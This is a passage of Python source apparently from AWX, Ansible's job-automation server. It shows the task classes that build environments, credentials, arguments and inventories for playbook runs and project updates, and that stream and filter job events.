env['PATH'] = os.path.join(settings.AWX_VENV_PATH, "bin")
def build_env(self, instance, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = {}
# Add ANSIBLE_* settings to the subprocess environment.
for attr in dir(settings):
if attr == attr.upper() and attr.startswith('ANSIBLE_'):
env[attr] = str(getattr(settings, attr))
# Also set environment variables configured in AWX_TASK_ENV setting.
for key, value in settings.AWX_TASK_ENV.items():
env[key] = str(value)
env['AWX_PRIVATE_DATA_DIR'] = private_data_dir
if self.instance.execution_environment is None:
raise RuntimeError('The project could not sync because there is no Execution Environment.')
return env
def build_inventory(self, instance, private_data_dir):
script_params = dict(hostvars=True, towervars=True)
if hasattr(instance, 'job_slice_number'):
script_params['slice_number'] = instance.job_slice_number
script_params['slice_count'] = instance.job_slice_count
script_data = instance.inventory.get_script_data(**script_params)
# maintain a list of host_name --> host_id
# so we can associate emitted events to Host objects
self.host_map = {hostname: hv.pop('remote_tower_id', '') for hostname, hv in script_data.get('_meta', {}).get('hostvars', {}).items()}
json_data = json.dumps(script_data)
path = os.path.join(private_data_dir, 'inventory')
fn = os.path.join(path, 'hosts')
with open(fn, 'w') as f:
os.chmod(fn, stat.S_IRUSR | stat.S_IXUSR | stat.S_IWUSR)
f.write('#! /usr/bin/env python3\n# -*- coding: utf-8 -*-\nprint(%r)\n' % json_data)
return fn
def build_args(self, instance, private_data_dir, passwords):
raise NotImplementedError
def write_args_file(self, private_data_dir, args):
env_path = os.path.join(private_data_dir, 'env')
try:
os.mkdir(env_path, stat.S_IREAD | stat.S_IWRITE | stat.S_IEXEC)
except OSError as e:
if e.errno != errno.EEXIST:
raise
path = os.path.join(env_path, 'cmdline')
handle = os.open(path, os.O_RDWR | os.O_CREAT, stat.S_IREAD | stat.S_IWRITE)
f = os.fdopen(handle, 'w')
f.write(ansible_runner.utils.args2cmdline(*args))
f.close()
os.chmod(path, stat.S_IRUSR)
return path
def build_credentials_list(self, instance):
return []
def get_instance_timeout(self, instance):
global_timeout_setting_name = instance._global_timeout_setting()
if global_timeout_setting_name:
global_timeout = getattr(settings, global_timeout_setting_name, 0)
local_timeout = getattr(instance, 'timeout', 0)
job_timeout = global_timeout if local_timeout == 0 else local_timeout
job_timeout = 0 if local_timeout < 0 else job_timeout
else:
job_timeout = 0
return job_timeout
def get_password_prompts(self, passwords={}):
"""
Return a dictionary where keys are strings or regular expressions for
prompts, and values are password lookup keys (keys that are returned
from build_passwords).
"""
return OrderedDict()
def create_expect_passwords_data_struct(self, password_prompts, passwords):
expect_passwords = {}
for k, v in password_prompts.items():
expect_passwords[k] = passwords.get(v, '') or ''
return expect_passwords
def pre_run_hook(self, instance, private_data_dir):
"""
Hook for any steps to run before the job/task starts
"""
instance.log_lifecycle("pre_run")
def post_run_hook(self, instance, status):
"""
Hook for any steps to run before job/task is marked as complete.
"""
instance.log_lifecycle("post_run")
def final_run_hook(self, instance, status, private_data_dir, fact_modification_times):
"""
Hook for any steps to run after job/task is marked as complete.
"""
instance.log_lifecycle("finalize_run")
job_profiling_dir = os.path.join(private_data_dir, 'artifacts/playbook_profiling')
awx_profiling_dir = '/var/log/tower/playbook_profiling/'
collections_info = os.path.join(private_data_dir, 'artifacts/', 'collections.json')
ansible_version_file = os.path.join(private_data_dir, 'artifacts/', 'ansible_version.txt')
if not os.path.exists(awx_profiling_dir):
os.mkdir(awx_profiling_dir)
if os.path.isdir(job_profiling_dir):
shutil.copytree(job_profiling_dir, os.path.join(awx_profiling_dir, str(instance.pk)))
if os.path.exists(collections_info):
with open(collections_info) as ee_json_info:
ee_collections_info = json.loads(ee_json_info.read())
instance.installed_collections = ee_collections_info
instance.save(update_fields=['installed_collections'])
if os.path.exists(ansible_version_file):
with open(ansible_version_file) as ee_ansible_info:
ansible_version_info = ee_ansible_info.readline()
instance.ansible_version = ansible_version_info
instance.save(update_fields=['ansible_version'])
def event_handler(self, event_data):
#
# ⚠️ D-D-D-DANGER ZONE ⚠️
# This method is called once for *every event* emitted by Ansible
# Runner as a playbook runs. That means that changes to the code in
# this method are _very_ likely to introduce performance regressions.
#
# Even if this function is made on average .05s slower, it can have
# devastating performance implications for playbooks that emit
# tens or hundreds of thousands of events.
#
# Proceed with caution!
#
"""
Ansible runner puts a parent_uuid on each event, no matter what the type.
AWX only saves the parent_uuid if the event is for a Job.
"""
# cache end_line locally for RunInventoryUpdate tasks
# which generate job events from two 'streams':
# ansible-inventory and the awx.main.commands.inventory_import
# logger
if isinstance(self, RunInventoryUpdate):
self.end_line = event_data['end_line']
if event_data.get(self.event_data_key, None):
if self.event_data_key != 'job_id':
event_data.pop('parent_uuid', None)
if self.parent_workflow_job_id:
event_data['workflow_job_id'] = self.parent_workflow_job_id
event_data['job_created'] = self.job_created
if self.host_map:
host = event_data.get('event_data', {}).get('host', '').strip()
if host:
event_data['host_name'] = host
if host in self.host_map:
event_data['host_id'] = self.host_map[host]
else:
event_data['host_name'] = ''
event_data['host_id'] = ''
if event_data.get('event') == 'playbook_on_stats':
event_data['host_map'] = self.host_map
if isinstance(self, RunProjectUpdate):
# it's common for Ansible's SCM modules to print
# error messages on failure that contain the plaintext
# basic auth credentials (username + password)
# it's also common for the nested event data itself (['res']['...'])
# to contain unredacted text on failure
# this is a _little_ expensive to filter
# with regex, but project updates don't have many events,
# so it *should* have a negligible performance impact
task = event_data.get('event_data', {}).get('task_action')
try:
if task in ('git', 'svn'):
event_data_json = json.dumps(event_data)
event_data_json = UriCleaner.remove_sensitive(event_data_json)
event_data = json.loads(event_data_json)
except json.JSONDecodeError:
pass
if 'event_data' in event_data:
event_data['event_data']['guid'] = self.guid
# To prevent overwhelming the broadcast queue, skip some websocket messages
if self.recent_event_timings:
cpu_time = time.time()
first_window_time = self.recent_event_timings[0]
last_window_time = self.recent_event_timings[-1]
if event_data.get('event') in MINIMAL_EVENTS:
should_emit = True # always send some types like playbook_on_stats
elif event_data.get('stdout') == '' and event_data['start_line'] == event_data['end_line']:
should_emit = False # exclude events with no output
else:
should_emit = any(
[
# if 30the most recent websocket message was sent over 1 second ago
cpu_time - first_window_time > 1.0,
# if the very last websocket message came in over 1/30 seconds ago
self.recent_event_timings.maxlen * (cpu_time - last_window_time) > 1.0,
# if the queue is not yet full
len(self.recent_event_timings) != self.recent_event_timings.maxlen,
]
)
if should_emit:
self.recent_event_timings.append(cpu_time)
else:
event_data.setdefault('event_data', {})
event_data['skip_websocket_message'] = True
elif self.recent_event_timings.maxlen:
self.recent_event_timings.append(time.time())
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
self.event_ct += 1
'''
Handle artifacts
'''
if event_data.get('event_data', {}).get('artifact_data', {}):
self.instance.artifacts = event_data['event_data']['artifact_data']
self.instance.save(update_fields=['artifacts'])
return False
def cancel_callback(self):
"""
Ansible runner callback to tell the job when/if it is canceled
"""
unified_job_id = self.instance.pk
self.instance = self.update_model(unified_job_id)
if not self.instance:
logger.error('unified job {} was deleted while running, canceling'.format(unified_job_id))
return True
if self.instance.cancel_flag or self.instance.status == 'canceled':
cancel_wait = (now() - self.instance.modified).seconds if self.instance.modified else 0
if cancel_wait > 5:
logger.warn('Request to cancel {} took {} seconds to complete.'.format(self.instance.log_format, cancel_wait))
return True
return False
def finished_callback(self, runner_obj):
"""
Ansible runner callback triggered on finished run
"""
event_data = {
'event': 'EOF',
'final_counter': self.event_ct,
'guid': self.guid,
}
event_data.setdefault(self.event_data_key, self.instance.id)
self.dispatcher.dispatch(event_data)
def status_handler(self, status_data, runner_config):
"""
Ansible runner callback triggered on status transition
"""
if status_data['status'] == 'starting':
job_env = dict(runner_config.env)
'''
Take the safe environment variables and overwrite
'''
for k, v in self.safe_env.items():
if k in job_env:
job_env[k] = v
from awx.main.signals import disable_activity_stream # Circular import
with disable_activity_stream():
self.instance = self.update_model(self.instance.pk, job_args=json.dumps(runner_config.command), job_cwd=runner_config.cwd, job_env=job_env)
elif status_data['status'] == 'error':
result_traceback = status_data.get('result_traceback', None)
if result_traceback:
from awx.main.signals import disable_activity_stream # Circular import
with disable_activity_stream():
self.instance = self.update_model(self.instance.pk, result_traceback=result_traceback)
@with_path_cleanup
def run(self, pk, **kwargs):
"""
Run the job/task and capture its output.
"""
self.instance = self.model.objects.get(pk=pk)
if self.instance.execution_environment_id is None:
from awx.main.signals import disable_activity_stream
with disable_activity_stream():
self.instance = self.update_model(self.instance.pk, execution_environment=self.instance.resolve_execution_environment())
# self.instance because of the update_model pattern and when it's used in callback handlers
self.instance = self.update_model(pk, status='running', start_args='') # blank field to remove encrypted passwords
self.instance.websocket_emit_status("running")
status, rc = 'error', None
extra_update_fields = {}
fact_modification_times = {}
self.event_ct = 0
'''
Needs to be an object property because status_handler uses it in a callback context
'''
self.safe_env = {}
self.safe_cred_env = {}
private_data_dir = None
# store a reference to the parent workflow job (if any) so we can include
# it in event data JSON
if self.instance.spawned_by_workflow:
self.parent_workflow_job_id = self.instance.get_workflow_job().id
self.job_created = str(self.instance.created)
try:
self.instance.send_notification_templates("running")
private_data_dir = self.build_private_data_dir(self.instance)
self.pre_run_hook(self.instance, private_data_dir)
self.instance.log_lifecycle("preparing_playbook")
if self.instance.cancel_flag:
self.instance = self.update_model(self.instance.pk, status='canceled')
if self.instance.status != 'running':
# Stop the task chain and prevent starting the job if it has
# already been canceled.
self.instance = self.update_model(pk)
status = self.instance.status
raise RuntimeError('not starting %s task' % self.instance.status)
if not os.path.exists(settings.AWX_ISOLATION_BASE_PATH):
raise RuntimeError('AWX_ISOLATION_BASE_PATH=%s does not exist' % settings.AWX_ISOLATION_BASE_PATH)
# Fetch "cached" fact data from prior runs and put on the disk
# where ansible expects to find it
if getattr(self.instance, 'use_fact_cache', False):
self.instance.start_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', str(self.instance.id), 'fact_cache'),
fact_modification_times,
)
# May have to serialize the value
private_data_files = self.build_private_data_files(self.instance, private_data_dir)
passwords = self.build_passwords(self.instance, kwargs)
self.build_extra_vars_file(self.instance, private_data_dir)
args = self.build_args(self.instance, private_data_dir, passwords)
env = self.build_env(self.instance, private_data_dir, private_data_files=private_data_files)
self.safe_env = build_safe_env(env)
credentials = self.build_credentials_list(self.instance)
for credential in credentials:
if credential:
credential.credential_type.inject_credential(credential, env, self.safe_cred_env, args, private_data_dir)
self.safe_env.update(self.safe_cred_env)
self.write_args_file(private_data_dir, args)
password_prompts = self.get_password_prompts(passwords)
expect_passwords = self.create_expect_passwords_data_struct(password_prompts, passwords)
params = {
'ident': self.instance.id,
'private_data_dir': private_data_dir,
'playbook': self.build_playbook_path_relative_to_cwd(self.instance, private_data_dir),
'inventory': self.build_inventory(self.instance, private_data_dir),
'passwords': expect_passwords,
'envvars': env,
'settings': {
'job_timeout': self.get_instance_timeout(self.instance),
'suppress_ansible_output': True,
},
}
if isinstance(self.instance, AdHocCommand):
params['module'] = self.build_module_name(self.instance)
params['module_args'] = self.build_module_args(self.instance)
if getattr(self.instance, 'use_fact_cache', False):
# Enable Ansible fact cache.
params['fact_cache_type'] = 'jsonfile'
else:
# Disable Ansible fact cache.
params['fact_cache_type'] = ''
if self.instance.is_container_group_task or settings.IS_K8S:
params['envvars'].pop('HOME', None)
'''
Delete parameters if the values are None or empty array
'''
for v in ['passwords', 'playbook', 'inventory']:
if not params[v]:
del params[v]
self.dispatcher = CallbackQueueDispatcher()
self.instance.log_lifecycle("running_playbook")
if isinstance(self.instance, SystemJob):
res = ansible_runner.interface.run(
project_dir=settings.BASE_DIR,
event_handler=self.event_handler,
finished_callback=self.finished_callback,
status_handler=self.status_handler,
**params,
)
else:
receptor_job = AWXReceptorJob(self, params)
res = receptor_job.run()
self.unit_id = receptor_job.unit_id
if not res:
return
status = res.status
rc = res.rc
if status == 'timeout':
self.instance.job_explanation = "Job terminated due to timeout"
status = 'failed'
extra_update_fields['job_explanation'] = self.instance.job_explanation
# ensure failure notification sends even if playbook_on_stats event is not triggered
handle_success_and_failure_notifications.apply_async([self.instance.job.id])
except Exception:
# this could catch programming or file system errors
extra_update_fields['result_traceback'] = traceback.format_exc()
logger.exception('%s Exception occurred while running task', self.instance.log_format)
finally:
logger.debug('%s finished running, producing %s events.', self.instance.log_format, self.event_ct)
try:
self.post_run_hook(self.instance, status)
except PostRunError as exc:
if status == 'successful':
status = exc.status
extra_update_fields['job_explanation'] = exc.args[0]
if exc.tb:
extra_update_fields['result_traceback'] = exc.tb
except Exception:
logger.exception('{} Post run hook errored.'.format(self.instance.log_format))
self.instance = self.update_model(pk)
self.instance = self.update_model(pk, status=status, emitted_events=self.event_ct, **extra_update_fields)
try:
self.final_run_hook(self.instance, status, private_data_dir, fact_modification_times)
except Exception:
logger.exception('{} Final run hook errored.'.format(self.instance.log_format))
self.instance.websocket_emit_status(status)
if status != 'successful':
if status == 'canceled':
raise AwxTaskError.TaskCancel(self.instance, rc)
else:
raise AwxTaskError.TaskError(self.instance, rc)
@task(queue=get_local_queuename)
class RunJob(BaseTask):
"""
Run a job using ansible-playbook.
"""
model = Job
event_model = JobEvent
event_data_key = 'job_id'
def build_private_data(self, job, private_data_dir):
"""
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
...
},
'certificates': {
<awx.main.models.Credential>: <signed SSH certificate data>,
<awx.main.models.Credential>: <signed SSH certificate data>,
...
}
}
"""
private_data = {'credentials': {}}
for credential in job.credentials.prefetch_related('input_sources__source_credential').all():
# If we were sent SSH credentials, decrypt them and send them
# back (they will be written to a temporary file).
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
if credential.has_input('ssh_public_key_data'):
private_data.setdefault('certificates', {})[credential] = credential.get_input('ssh_public_key_data', default='')
return private_data
def build_passwords(self, job, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key, SSH user, sudo/su
and ansible-vault.
"""
passwords = super(RunJob, self).build_passwords(job, runtime_passwords)
cred = job.machine_credential
if cred:
for field in ('ssh_key_unlock', 'ssh_password', 'become_password', 'vault_password'):
value = runtime_passwords.get(field, cred.get_input('password' if field == 'ssh_password' else field, default=''))
if value not in ('', 'ASK'):
passwords[field] = value
for cred in job.vault_credentials:
field = 'vault_password'
vault_id = cred.get_input('vault_id', default=None)
if vault_id:
field = 'vault_password.{}'.format(vault_id)
if field in passwords:
raise RuntimeError('multiple vault credentials were specified with --vault-id {}@prompt'.format(vault_id))
value = runtime_passwords.get(field, cred.get_input('vault_password', default=''))
if value not in ('', 'ASK'):
passwords[field] = value
'''
Only 1 value can be provided for a unique prompt string. Prefer ssh
key unlock over network key unlock.
'''
if 'ssh_key_unlock' not in passwords:
for cred in job.network_credentials:
if cred.inputs.get('ssh_key_unlock'):
passwords['ssh_key_unlock'] = runtime_passwords.get('ssh_key_unlock', cred.get_input('ssh_key_unlock', default=''))
break
return passwords
def build_env(self, job, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunJob, self).build_env(job, private_data_dir, private_data_files=private_data_files)
if private_data_files is None:
private_data_files = {}
# Set environment variables needed for inventory and job event
# callbacks to work.
env['JOB_ID'] = str(job.pk)
env['INVENTORY_ID'] = str(job.inventory.pk)
if job.project:
env['PROJECT_REVISION'] = job.project.scm_revision
env['ANSIBLE_RETRY_FILES_ENABLED'] = "False"
env['MAX_EVENT_RES'] = str(settings.MAX_EVENT_RES_DATA)
if hasattr(settings, 'AWX_ANSIBLE_CALLBACK_PLUGINS') and settings.AWX_ANSIBLE_CALLBACK_PLUGINS:
env['ANSIBLE_CALLBACK_PLUGINS'] = ':'.join(settings.AWX_ANSIBLE_CALLBACK_PLUGINS)
env['AWX_HOST'] = settings.TOWER_URL_BASE
# Create a directory for ControlPath sockets that is unique to each job
cp_dir = os.path.join(private_data_dir, 'cp')
if not os.path.exists(cp_dir):
os.mkdir(cp_dir, 0o700)
# FIXME: more elegant way to manage this path in container
env['ANSIBLE_SSH_CONTROL_PATH_DIR'] = '/runner/cp'
# Set environment variables for cloud credentials.
cred_files = private_data_files.get('credentials', {})
for cloud_cred in job.cloud_credentials:
if cloud_cred and cloud_cred.credential_type.namespace == 'openstack' and cred_files.get(cloud_cred, ''):
env['OS_CLIENT_CONFIG_FILE'] = to_container_path(cred_files.get(cloud_cred, ''), private_data_dir)
for network_cred in job.network_credentials:
env['ANSIBLE_NET_USERNAME'] = network_cred.get_input('username', default='')
env['ANSIBLE_NET_PASSWORD'] = network_cred.get_input('password', default='')
ssh_keyfile = cred_files.get(network_cred, '')
if ssh_keyfile:
env['ANSIBLE_NET_SSH_KEYFILE'] = ssh_keyfile
authorize = network_cred.get_input('authorize', default=False)
env['ANSIBLE_NET_AUTHORIZE'] = str(int(authorize))
if authorize:
env['ANSIBLE_NET_AUTH_PASS'] = network_cred.get_input('authorize_password', default='')
path_vars = (
('ANSIBLE_COLLECTIONS_PATHS', 'collections_paths', 'requirements_collections', '~/.ansible/collections:/usr/share/ansible/collections'),
('ANSIBLE_ROLES_PATH', 'roles_path', 'requirements_roles', '~/.ansible/roles:/usr/share/ansible/roles:/etc/ansible/roles'),
)
config_values = read_ansible_config(job.project.get_project_path(), list(map(lambda x: x[1], path_vars)))
for env_key, config_setting, folder, default in path_vars:
paths = default.split(':')
if env_key in env:
for path in env[env_key].split(':'):
if path not in paths:
paths = [env[env_key]] + paths
elif config_setting in config_values:
for path in config_values[config_setting].split(':'):
if path not in paths:
paths = [config_values[config_setting]] + paths
paths = [os.path.join(CONTAINER_ROOT, folder)] + paths
env[env_key] = os.pathsep.join(paths)
return env
def build_args(self, job, private_data_dir, passwords):
"""
Build command line argument list for running ansible-playbook,
optionally using ssh-agent for public/private key authentication.
"""
creds = job.machine_credential
ssh_username, become_username, become_method = '', '', ''
if creds:
ssh_username = creds.get_input('username', default='')
become_method = creds.get_input('become_method', default='')
become_username = creds.get_input('become_username', default='')
else:
become_method = None
become_username = ""
# Always specify the normal SSH user as root by default. Since this
# task is normally running in the background under a service account,
# it doesn't make sense to rely on ansible-playbook's default of using
# the current user.
ssh_username = ssh_username or 'root'
args = []
if job.job_type == 'check':
args.append('--check')
args.extend(['-u', sanitize_jinja(ssh_username)])
if 'ssh_password' in passwords:
args.append('--ask-pass')
if job.become_enabled:
args.append('--become')
if job.diff_mode:
args.append('--diff')
if become_method:
args.extend(['--become-method', sanitize_jinja(become_method)])
if become_username:
args.extend(['--become-user', sanitize_jinja(become_username)])
if 'become_password' in passwords:
args.append('--ask-become-pass')
# Support prompting for multiple vault passwords
for k, v in passwords.items():
if k.startswith('vault_password'):
if k == 'vault_password':
args.append('--ask-vault-pass')
else:
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
args.append('--vault-id')
args.append('{}@prompt'.format(vault_id))
if job.forks:
if settings.MAX_FORKS > 0 and job.forks > settings.MAX_FORKS:
logger.warning(f'Maximum number of forks ({settings.MAX_FORKS}) exceeded.')
args.append('--forks=%d' % settings.MAX_FORKS)
else:
args.append('--forks=%d' % job.forks)
if job.force_handlers:
args.append('--force-handlers')
if job.limit:
args.extend(['-l', job.limit])
if job.verbosity:
args.append('-%s' % ('v' * min(5, job.verbosity)))
if job.job_tags:
args.extend(['-t', job.job_tags])
if job.skip_tags:
args.append('--skip-tags=%s' % job.skip_tags)
if job.start_at_task:
args.append('--start-at-task=%s' % job.start_at_task)
return args
def build_playbook_path_relative_to_cwd(self, job, private_data_dir):
return job.playbook
def build_extra_vars_file(self, job, private_data_dir):
# Define special extra_vars for AWX, combine with job.extra_vars.
extra_vars = job.awx_meta_vars()
if job.extra_vars_dict:
extra_vars.update(json.loads(job.decrypted_extra_vars()))
# By default, all extra vars disallow Jinja2 template usage for
# security reasons; top level key-values defined in JT.extra_vars, however,
# are allowed as "safe" (because they can only be set by users with
# higher levels of privilege - those that have the ability create and
# edit Job Templates)
safe_dict = {}
if job.job_template and settings.ALLOW_JINJA_IN_EXTRA_VARS == 'template':
safe_dict = job.job_template.extra_vars_dict
return self._write_extra_vars_file(private_data_dir, extra_vars, safe_dict)
def build_credentials_list(self, job):
return job.credentials.prefetch_related('input_sources__source_credential').all()
def get_password_prompts(self, passwords={}):
d = super(RunJob, self).get_password_prompts(passwords)
d[r'Enter passphrase for .*:\s*?$'] = 'ssh_key_unlock'
d[r'Bad passphrase, try again for .*:\s*?$'] = ''
for method in PRIVILEGE_ESCALATION_METHODS:
d[r'%s password.*:\s*?$' % (method[0])] = 'become_password'
d[r'%s password.*:\s*?$' % (method[0].upper())] = 'become_password'
d[r'BECOME password.*:\s*?$'] = 'become_password'
d[r'SSH password:\s*?$'] = 'ssh_password'
d[r'Password:\s*?$'] = 'ssh_password'
d[r'Vault password:\s*?$'] = 'vault_password'
for k, v in passwords.items():
if k.startswith('vault_password.'):
# split only on the first dot in case the vault ID itself contains a dot
vault_id = k.split('.', 1)[1]
d[r'Vault password \({}\):\s*?$'.format(vault_id)] = k
return d
def build_execution_environment_params(self, instance, private_data_dir):
if settings.IS_K8S:
return {}
params = super(RunJob, self).build_execution_environment_params(instance, private_data_dir)
# If this has an insights agent and it is not already mounted then show it
insights_dir = os.path.dirname(settings.INSIGHTS_SYSTEM_ID_FILE)
if instance.use_fact_cache and os.path.exists(insights_dir):
logger.info('not parent of others')
params.setdefault('container_volume_mounts', [])
params['container_volume_mounts'].extend(
[
f"{insights_dir}:{insights_dir}:Z",
]
)
return params
def pre_run_hook(self, job, private_data_dir):
super(RunJob, self).pre_run_hook(job, private_data_dir)
if job.inventory is None:
error = _('Job could not start because it does not have a valid inventory.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.project is None:
error = _('Job could not start because it does not have a valid project.')
self.update_model(job.pk, status='failed', job_explanation=error)
raise RuntimeError(error)
elif job.execution_environment is None:
error = _('Job could not start because no Execution Environment could be found.')
self.update_model(job.pk, status='error', job_explanation=error)
raise RuntimeError(error)
elif job.project.status in ('error', 'failed'):
msg = _('The project revision for this job template is unknown due to a failed update.')
job = self.update_model(job.pk, status='failed', job_explanation=msg)
raise RuntimeError(msg)
project_path = job.project.get_project_path(check_if_exists=False)
job_revision = job.project.scm_revision
sync_needs = []
source_update_tag = 'update_{}'.format(job.project.scm_type)
branch_override = bool(job.scm_branch and job.scm_branch != job.project.scm_branch)
if not job.project.scm_type:
pass # manual projects are not synced, user has responsibility for that
elif not os.path.exists(project_path):
logger.debug('Performing fresh clone of {} on this instance.'.format(job.project))
sync_needs.append(source_update_tag)
elif job.project.scm_type == 'git' and job.project.scm_revision and (not branch_override):
try:
git_repo = git.Repo(project_path)
if job_revision == git_repo.head.commit.hexsha:
logger.debug('Skipping project sync for {} because commit is locally available'.format(job.log_format))
else:
sync_needs.append(source_update_tag)
except (ValueError, BadGitName, git.exc.InvalidGitRepositoryError):
logger.debug('Needed commit for {} not in local source tree, will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
else:
logger.debug('Project not available locally, {} will sync with remote'.format(job.log_format))
sync_needs.append(source_update_tag)
has_cache = os.path.exists(os.path.join(job.project.get_cache_path(), job.project.cache_id))
# Galaxy requirements are not supported for manual projects
if job.project.scm_type and ((not has_cache) or branch_override):
sync_needs.extend(['install_roles', 'install_collections'])
if sync_needs:
pu_ig = job.instance_group
pu_en = Instance.objects.me().hostname
sync_metafields = dict(
launch_type="sync",
job_type='run',
job_tags=','.join(sync_needs),
status='running',
instance_group=pu_ig,
execution_node=pu_en,
celery_task_id=job.celery_task_id,
)
if branch_override:
sync_metafields['scm_branch'] = job.scm_branch
sync_metafields['scm_clean'] = True # to accomidate force pushes
if 'update_' not in sync_metafields['job_tags']:
sync_metafields['scm_revision'] = job_revision
local_project_sync = job.project.create_project_update(_eager_fields=sync_metafields)
create_partition(local_project_sync.event_class._meta.db_table, start=local_project_sync.created)
# save the associated job before calling run() so that a
# cancel() call on the job can cancel the project update
job = self.update_model(job.pk, project_update=local_project_sync)
project_update_task = local_project_sync._get_task_class()
try:
# the job private_data_dir is passed so sync can download roles and collections there
sync_task = project_update_task(job_private_data_dir=private_data_dir)
sync_task.run(local_project_sync.id)
local_project_sync.refresh_from_db()
job = self.update_model(job.pk, scm_revision=local_project_sync.scm_revision)
except Exception:
local_project_sync.refresh_from_db()
if local_project_sync.status != 'canceled':
job = self.update_model(
job.pk,
status='failed',
job_explanation=(
'Previous Task Failed: {"job_type": "%s", "job_name": "%s", "job_id": "%s"}'
% ('project_update', local_project_sync.name, local_project_sync.id)
),
)
raise
job.refresh_from_db()
if job.cancel_flag:
return
else:
# Case where a local sync is not needed, meaning that local tree is
# up-to-date with project, job is running project current version
if job_revision:
job = self.update_model(job.pk, scm_revision=job_revision)
# Project update does not copy the folder, so copy here
RunProjectUpdate.make_local_copy(job.project, private_data_dir, scm_revision=job_revision)
if job.inventory.kind == 'smart':
# cache smart inventory memberships so that the host_filter query is not
# ran inside of the event saving code
update_smart_memberships_for_inventory(job.inventory)
def final_run_hook(self, job, status, private_data_dir, fact_modification_times):
super(RunJob, self).final_run_hook(job, status, private_data_dir, fact_modification_times)
if not private_data_dir:
# If there's no private data dir, that means we didn't get into the
# actual `run()` call; this _usually_ means something failed in
# the pre_run_hook method
return
if job.use_fact_cache:
job.finish_job_fact_cache(
os.path.join(private_data_dir, 'artifacts', 'fact_cache'),
fact_modification_times,
)
try:
inventory = job.inventory
except Inventory.DoesNotExist:
pass
else:
if inventory is not None:
update_inventory_computed_fields.delay(inventory.id)
@task(queue=get_local_queuename)
class RunProjectUpdate(BaseTask):
model = ProjectUpdate
event_model = ProjectUpdateEvent
event_data_key = 'project_update_id'
def __init__(self, *args, job_private_data_dir=None, **kwargs):
super(RunProjectUpdate, self).__init__(*args, **kwargs)
self.playbook_new_revision = None
self.original_branch = None
self.job_private_data_dir = job_private_data_dir
def event_handler(self, event_data):
super(RunProjectUpdate, self).event_handler(event_data)
returned_data = event_data.get('event_data', {})
if returned_data.get('task_action', '') == 'set_fact':
returned_facts = returned_data.get('res', {}).get('ansible_facts', {})
if 'scm_version' in returned_facts:
self.playbook_new_revision = returned_facts['scm_version']
def build_private_data(self, project_update, private_data_dir):
"""
Return SSH private key data needed for this project update.
Returns a dict of the form
{
'credentials': {
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>,
<awx.main.models.Credential>: <credential_decrypted_ssh_key_data>
}
}
"""
private_data = {'credentials': {}}
if project_update.credential:
credential = project_update.credential
if credential.has_input('ssh_key_data'):
private_data['credentials'][credential] = credential.get_input('ssh_key_data', default='')
return private_data
def build_passwords(self, project_update, runtime_passwords):
"""
Build a dictionary of passwords for SSH private key unlock and SCM
username/password.
"""
passwords = super(RunProjectUpdate, self).build_passwords(project_update, runtime_passwords)
if project_update.credential:
passwords['scm_key_unlock'] = project_update.credential.get_input('ssh_key_unlock', default='')
passwords['scm_username'] = project_update.credential.get_input('username', default='')
passwords['scm_password'] = project_update.credential.get_input('password', default='')
return passwords
def build_env(self, project_update, private_data_dir, private_data_files=None):
"""
Build environment dictionary for ansible-playbook.
"""
env = super(RunProjectUpdate, self).build_env(project_update, private_data_dir, private_data_files=private_data_files)
env['ANSIBLE_RETRY_FILES_ENABLED'] = str(False)
env['ANSIBLE_ASK_PASS'] = str(False)
env['ANSIBLE_BECOME_ASK_PASS'] = str(False)
env['DISPLAY'] = '' # Prevent stupid password popup when running tests.
# give ansible a hint about the intended tmpdir to work around issues
# like https://github.com/ansible/ansible/issues/30064
env['TMP'] = settings.AWX_ISOLATION_BASE_PATH
env['PROJECT_UPDATE_ID'] = str(project_update.pk)
if settings.GALAXY_IGNORE_CERTS:
env['ANSIBLE_GALAXY_IGNORE'] = True
# build out env vars for Galaxy credentials (in order)
galaxy_server_list = []
if project_update.project.organization:
for i, cred in enumerate(project_update.project.organization.galaxy_credentials.all()):
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_URL'] = cred.get_input('url')
auth_url = cred.get_input('auth_url', default=None)
token = cred.get_input('token', default=None)
if token:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_TOKEN'] = token
if auth_url:
env[f'ANSIBLE_GALAXY_SERVER_SERVER{i}_AUTH_URL'] = auth_url
galaxy_server_list.append(f'server{i}')
if galaxy_server_list:
env['ANSIBLE_GALAXY_SERVER_LIST'] = ','.join(galaxy_server_list)
return env
def _build_scm_url_extra_vars(self, project_update):
"""
Helper method to build SCM url and extra vars with parameters needed
for authentication.
"""
extra_vars = {}
if project_update.credential:
scm_username = project_update.credential.get_input('username', default='')
scm_password = project_update.credential.get_input('password', default='')
else:
scm_username = ''
scm_password = ''
scm_type = project_update.scm_type
scm_url = update_scm_url(scm_type, project_update.scm_url, check_special_cases=False)
scm_url_parts = urlparse.urlsplit(scm_url)
# Prefer the username/password in the URL, if provided.
scm_username = scm_url_parts.username or scm_username
scm_password = scm_url_parts.password or scm_password
if scm_username:
if scm_type == 'svn':
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_password = False
if scm_url_parts.scheme != 'svn+ssh':
scm_username = False
elif scm_url_parts.scheme.endswith('ssh'):
scm_password = False
elif scm_type in ('insights', 'archive'):
extra_vars['scm_username'] = scm_username
extra_vars['scm_password'] = scm_password
scm_url = update_scm_url(scm_type, scm_url, scm_username, scm_password, scp_format=True)
else:
scm_url = update_scm_url(scm_type, scm_url, scp_format=True)
# Pass the extra accept_hostkey parameter to the git module.
if scm_type == 'git' and scm_url_parts.scheme.endswith('ssh'):
extra_vars['scm_accept_hostkey'] = 'true'
return scm_url, extra_vars
def build_inventory(self, instance, private_data_dir):
return 'localhost,'
